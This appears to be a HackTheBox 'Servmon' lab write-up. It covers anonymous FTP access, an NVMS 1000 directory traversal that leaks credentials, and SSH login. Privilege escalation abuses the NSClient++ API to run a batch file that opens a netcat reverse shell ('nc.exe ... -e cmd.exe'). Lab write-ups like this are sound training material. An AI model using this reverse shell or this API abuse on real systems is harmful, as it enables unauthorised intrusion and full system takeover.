HackTheBox - Servmon Write-up

Information Gathering

Port and service enumeration using nmap

nmap -F -T 5 -Pn

Nmap scan report for
Host is up (0.19s latency).
Not shown: 92 closed ports
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
5666/tcp open  nrpe
8443/tcp open  https-al


FTP port is open so lets try anonymous login here...

username : anonymous
password : anonymous
$ ftp

Connected to
220 Microsoft FTP Service
Name ( anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
230 User logged in.
Remote system type is Windows_NT

Anonymous Login was successful, after some enumeration I found some interesting files and two usernames, downloaded using get command in ftp shell...

get Users/Nadine/Confidential.txt
get Users/Nathan/Notes to do.txt
$ cat Confidential.txt

I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.



$ cat 'Notes to do.txt'
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

On port 80 NVMS 1000 web application was running, a quick google search led to a directory traversal vulnerability so I tried to get this Passwords.txt file...

| Username : Nadine            |
| Password : L1k3B1gBut7s@W0rk |

SSH service was also active as we can see in the nmap scan so next step was to login using these credentials...

scp Nadine@ user.txt

Got User!

Privilege Escalation

In Confidential.txt NSClient is mentioned so it was time for some more digging...

> dir /s *nsclient*

Directory of C:\Program Files\NSClient++

10/04/2020  19:32             2,683 nsclient.ini
21/04/2020  08:27            29,651 nsclient.log
               2 File(s)         32,334 bytes

For reading files there were two easy ways here...

type nsclient.ini 


nscp web -- password --display

; Undocumented key
password = ew2x6SsGTxjRwXOT

; Undocumented key
allowed hosts =

Only localhost is allowed...solution is to use an SSH tunnel and then we can visit the webpage

ssh -L 8443: Nadine@

After some poking around in the web page and some NSClient++ manual reading the best way to exploit this was to use the API, first I created a small .bat file and uploaded it to temp directory, after that privesc needs just two commands...

$ cat twh.bat
@echo off
c:\temp\nc.exe 443 -e cmd.exe

$ scp twh.bat Nadine@
$ scp nc.exe Nadine@

and now finally...

$ curl -s -k -u admin -X PUT --data-binary @twh.bat

> C:\Program Files\NSClient++>check_nrpe.exe -c twh

Got Root!